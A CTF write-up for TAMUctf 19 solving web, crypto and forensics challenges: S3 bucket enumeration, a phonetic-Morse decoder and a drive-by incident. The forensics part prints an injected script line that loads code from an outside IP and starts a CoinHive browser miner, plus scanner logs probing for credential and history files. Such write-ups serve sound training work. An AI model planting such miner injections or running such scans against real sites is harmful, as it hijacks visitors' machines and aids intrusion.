writeups

TAMUctf 19 - Write-ups

noraj (Alexandre ZANNI)
, , , , , ,
🇬🇧

Information#

CTF#

  • Name : TAMUctf 19
  • Website : tamuctf.com
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

Easy - Robots Rule - Web#

http://web5.tamuctf.com/

1
2
3
4
5
6
$ curl http://web5.tamuctf.com/robots.txt
User-agent: *

WHAT IS UP, MY FELLOW HUMAN!
HAVE YOU RECEIVED SECRET INFORMATION ON THE DASTARDLY GOOGLE ROBOTS?!
YOU CAN TELL ME, A FELLOW NOT-A-ROBOT!

Let's find google bot user agent: https://support.google.com/webmasters/answer/1061943?hl=en

1
2
3
4
5
6
$ curl http://web5.tamuctf.com/robots.txt -H 'User-agent: Googlebot'
User-agent: *

THE HUMANS SUSPECT NOTHING!
HERE IS THE SECRET INFORMATION: gigem{be3p-bOop_rob0tz_4-lyfe}
LONG LIVE THE GOOGLEBOTS!

Easy - Buckets - Web#

Checkout my s3 bucket website! http://tamuctf.s3-website-us-west-2.amazonaws.com/

We are looking for a Amazon S3 bucket.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ curl http://tamuctf.s3-website-us-west-2.amazonaws.com/
<!DOCTYPE html>
<!--http://ctfdevbucket.s3-website.us-east-2.amazonaws.com/-->
<html>
<head>
<!--Wow my first AWS web page!
        I think I am finally figuring out S3 buckets,
        it is just really so easy to use!
        If you forget for your passwords it is near the Dogs..-->
<style>
#DIV {
        background-color: white;
        color: black;
        text-align: center;
}
</style>

<title>AWS Problem</title>
</head>
<body style="background-image:url(doggos3.jpg)">

<div id="DIV">
<h1>Dogs are definitely better than cats</h1>
</div>

<!--If you look around hard enough you might find some dogs, some cats, some animals and some mysteries-->

</body>
</html>

https://github.com/VirtueSecurity/aws-extender-cli

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ python ~/CTF/tools/aws-extender-cli/aws_extender_cli.py -b tamuctf -s S3
===== (tamuctf) =====
[*] s3:GetBucketAcl
        * ctf->FULL_CONTROL
        * http://acs.amazonaws.com/groups/global/AllUsers->READ
        * http://acs.amazonaws.com/groups/global/AllUsers->READ_ACP
[*] s3:ListMultipartUploadParts
[*] s3:ListBucket
        * Animals/animals.jpg
        * Animals/cute-zoo-animals_1191-143.jpg
        * Animals/images.jpeg
        * Cats/cat.jpeg
        * Cats/cat.webp
        * Cats/cat3.jpeg
        * Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt
        * Dogs/beaglepup.jpeg
        * Dogs/pup.html
        * Dogs/puphalloween.jpeg

$ curl http://tamuctf.s3-website-us-west-2.amazonaws.com/Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt
flag{W0W_S3_BAD_PERMISSIONS}

Easy - Many Gig'ems to you! - Web#

http://web7.tamuctf.com

I won't give any explication, this challenge has no sense.

1
2
3
4
5
$ curl http://web7.tamuctf.com/cook.js
document.cookie = "gigem_continue=cookies}; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "hax0r=flagflagflagflagflagflag; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "gigs=all_the_cookies; expires=Thu, 18 Dec 2020 12:00:00 UTC";
document.cookie = "cookie=flagcookiegigemflagcookie; expires=Thu, 18 Dec 2020 12:00:00 UTC";
1
2
3
4
5
6
7
$ curl -s http://web7.tamuctf.com/index.html | grep -oh -E 'gigem\{[^"]+"'
gigem{flag_in_"

$ curl -s http://web7.tamuctf.com/cookies.html | grep -oh -E 'gigem\{[^"]+"'
gigem{continued == source_and_"
gigem{_continued=source_and_"
gigem{_continued=source_and_"

gigem{flag_in_source_and_cookies}

Note: cancerous challenge, please never create challenge like that.

Easy - -.- - Crytpo#

To 1337-H4X0R:

Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?

dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit

It is some phonetic morse that we need to decode.

So I wrote a ruby script to translate that:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
require 'optparse'

params = {}
OptionParser.new do |opts|
  opts.on('-f', '--file [FILE]', String, "Test file containing morse code")
end.parse!(into: params)

morse = {
  'A' => 'di-dah', 'B' => 'dah-di-di-dit', 'C' => 'dah-di-dah-dit',
  'D' => 'dah-di-dit', 'E' => 'dit', 'F' => 'di-di-dah-dit',
  'G' => 'dah-dah-dit', 'H' => 'di-di-di-dit', 'I' => 'di-dit',
  'J' => 'di-dah-dah-dah', 'K' => 'dah-di-dah', 'L' => 'di-dah-di-dit',
  'M' => 'dah-dah', 'N' => 'dah-dit', 'O' => 'dah-dah-dah',
  'P' => 'di-dah-dah-dit', 'Q' => 'dah-dah-di-dah', 'R' => 'di-dah-dit',
  'S' => 'di-di-dit', 'T' => 'dah', 'U' => 'di-di-dah', 'V' => 'di-di-di-dah',
  'W' => 'di-dah-dah', 'X' => 'dah-di-di-dah', 'Y' => 'dah-di-dah-dah',
  'Z' => 'dah-dah-di-dit', '0' => 'dah-dah-dah-dah-dah',
  '1' => 'di-dah-dah-dah-dah', '2' => 'di-di-dah-dah-dah',
  '3' => 'di-di-di-dah-dah', '4' => 'di-di-di-di-dah', '5' => 'di-di-di-di-dit',
  '6' => 'dah-di-di-di-dit', '7' => 'dah-dah-di-di-dit',
  '8' => 'dah-dah-dah-di-dit', '9' => 'dah-dah-dah-dah-dit',
  'ä' => 'di-dah-di-dah', 'á' => 'di-dah-dah-di-dah',
  'Ã¥' => 'di-dah-dah-di-dah', 'Ch' => 'dah-dah-dah-dah',
  'é' => 'di-di-dah-di-dit', 'ñ' => 'dah-dah-di-dah-dah',
  'ö' => 'dah-dah-dah-dit', 'ü' => 'di-di-dah-dah',
  '&' => 'di-dah-di-di-dit', "'" => 'di-dah-dah-dah-dah-dit',
  '@' => 'di-dah-dah-di-dah-dit', ')' => 'dah-di-dah-dah-di-dah',
  '(' => 'dah-di-dah-dah-dit', ':' => 'dah-dah-dah-di-di-dit',
  ',' => 'dah-dah-di-di-dah-dah', '=' => 'dah-di-di-di-dah',
  '!' => 'dah-di-dah-di-dah-dah', '.' => 'di-dah-di-dah-di-dah',
  '-' => 'dah-di-di-di-di-dah', '+' => 'di-dah-di-dah-dit',
  '"' => 'di-dah-di-di-dah-dit', '?' => 'di-di-dah-dah-di-dit',
  '/' => 'dah-di-di-dah-dit'
}

if params[:file]
  data = File.open(params[:file], 'r').read
  morse.each do |k,v|
    data.gsub!(/\b(?<!\-)(#{v})\b(?!-)/,k) # match whole word
  end
  data.gsub!(/ /,'')
  puts data
end

Now just decode the result:

1
2
3
4
5
6
7
8
$ ruby phonetic-morse.rb -f flag.txt
0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149

$ ruby phonetic-morse.rb -f flag.txt | xxd -r -p
Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI

$ ruby phonetic-morse.rb -f flag.txt | xxd -r -p | grep -o -E 'gigem{.*}'
gigem{C1icK_cl1CK-y0u_h4v3_m4I1}

Easy - 0_intrusion - DriveByInc#

Welcome to Drive By Inc. We provide all sorts of logistical solutions for our customers. Over the past few years we moved to hosting a large portion of our business on a nice looking website. Recently our customers are complaining that the front page of our website is causing their computers to run extremely slowly. We hope that it is just because we added too much javascript but can you take a look for us just to make sure?

  1. What is the full malicious line? (Including any HTML tags)

On the web page we do Ctrl + U to see the source code and at the bottom we can see a line (n°548) where a script is not loaded from js/ but rather from an external host and is then followed by an inline script launching a cryptocurrency miner:

1
<script src = http://10.187.195.95/js/colorbox.min.js></script><script>var color = new CoinHive.Anonymous("123456-asdfgh");color.start()</script></body>

Easy - 1_logs - DriveByInc#

Strange. We don't know how that got there. We have since gone and removed the offending lines. Maybe one of our developers wanted to make some money on the side. Here is a pcap and some web server logs from the day that users started complaining. Can you figure out if something nefarious happened while we go talk to the devs?

  1. What is the ip of the attacker?
  2. What ports did they find open? (List low to high ex: 1,2,3)
  3. What are the names of the web files they found on the server? (List in alphabetical order comma seperated ex: a.html,a.php,b.html)

(pcap + logs.zip)

The log archive is containing:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
logs
├── alternatives.log
├── apache2
│   ├── access.log
│   ├── error.log
│   └── other_vhosts_access.log
├── apt
│   ├── history.log
│   └── term.log
├── auth.log
├── cloud-init.log
├── cloud-init-output.log
├── dist-upgrade
├── dpkg.log
├── fsck
│   ├── checkfs
│   └── checkroot
├── kern.log
├── lastlog
├── logs.zip
├── lxd
├── mysql
│   └── error.log
├── syslog
├── unattended-upgrades
└── wtmp

IP of the attacker#

So let's take a quick look at apache2/access.log to try to find traces of a web scanner. We can quickly identify this IP address:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /randomfile1.php HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /frand2.php HTTP/1.1" 404 445 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!.html HTTP/1.1" 404 441 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!.php HTTP/1.1" 404 440 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!_archives.html HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!_archives.php HTTP/1.1" 404 449 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!_images.html HTTP/1.1" 404 448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!_images.php HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!backup.html HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!backup.php HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!images.html HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!images.php HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!res.html HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!res.php HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!textove_diskuse.html HTTP/1.1" 404 456 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!textove_diskuse.php HTTP/1.1" 404 455 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!ut.html HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /!ut.php HTTP/1.1" 404 442 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.bash_history.html HTTP/1.1" 404 453 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.bash_history.php HTTP/1.1" 404 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.bashrc.html HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.bashrc.php HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.cvs.html HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.cvs.php HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.cvsignore.html HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.cvsignore.php HTTP/1.1" 404 449 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.forward.html HTTP/1.1" 404 448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.forward.php HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.history.html HTTP/1.1" 404 448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.history.php HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htaccess.html HTTP/1.1" 403 460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htaccess.html_ HTTP/1.1" 403 461 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htaccess.php HTTP/1.1" 403 459 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htaccess.php_ HTTP/1.1" 403 460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htpasswd.html HTTP/1.1" 403 460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htpasswd.html_ HTTP/1.1" 403 461 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htpasswd.php HTTP/1.1" 403 459 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.htpasswd.php_ HTTP/1.1" 403 460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.listing.html HTTP/1.1" 404 448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.listing.php HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.passwd.html HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.passwd.php HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.perf.html HTTP/1.1" 404 445 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.perf.php HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.profile.html HTTP/1.1" 404 448 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.profile.php HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.rhosts.html HTTP/1.1" 404 447 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.rhosts.php HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.ssh.html HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.ssh.php HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.subversion.html HTTP/1.1" 404 451 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.subversion.php HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.svn.html HTTP/1.1" 404 444 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.187.195.95 - - [22/May/2018:19:08:43 +0000] "GET /.svn.php HTTP/1.1" 404 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
